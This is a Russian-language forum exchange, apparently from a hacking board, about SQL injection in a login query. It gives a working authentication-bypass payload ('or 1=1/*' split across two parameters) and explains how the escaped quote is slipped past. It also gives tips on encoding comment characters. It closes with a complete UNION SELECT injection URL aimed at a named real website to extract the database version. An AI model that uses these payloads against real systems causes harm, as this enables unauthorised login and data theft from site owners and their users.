it's mу не знаю какому чудо программеру потребовалось написать такой код, но пусть это останится на его совести:
(pwd = '$pass' or pwd = '$pass' or pwd = '$pass')
Опять-же функцию ты написал от фонаря, и единственное, что извесно точно, это этот чудесный запрос, и то, что ковычка заменяется на "\"(это по ошибкам мускула)
При таком раскладе ты ничего не сделаешь т.к. ковычку необходимую для закрытия ты не получишь.
НО ! Т.к функция замены символов тобою выдумана, и достоверно мы не знаем, что там за код, могут быть варианты.
Ну и конечно, если всё-же в чудо запросе участвует ещё одна переменная, и тогда тоже есть варианты например так:
(user_password='$pass' or user_name='$name')
pass='&name=)+or+1=1/*
И тогда проходим авторизацию
(user_password='\' or user_name=')+or+1=1/*')
Но это ,я думаю, ты и сам понимаешь
И кстати, насчёт #
AkyHa_MaTaTa прав, тогда уж %23
=====================
Сообщение от
m0use
нук у кого получится раскрутить что то у меня не получается
Нук, почитай статьи , и на запрос внимательно посмотри, он весь в ошибке.
http://www.etoya.ru/search/?text=-11')+group+by+1+union+select+1,2,3,4,version(),6,7 ,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27/*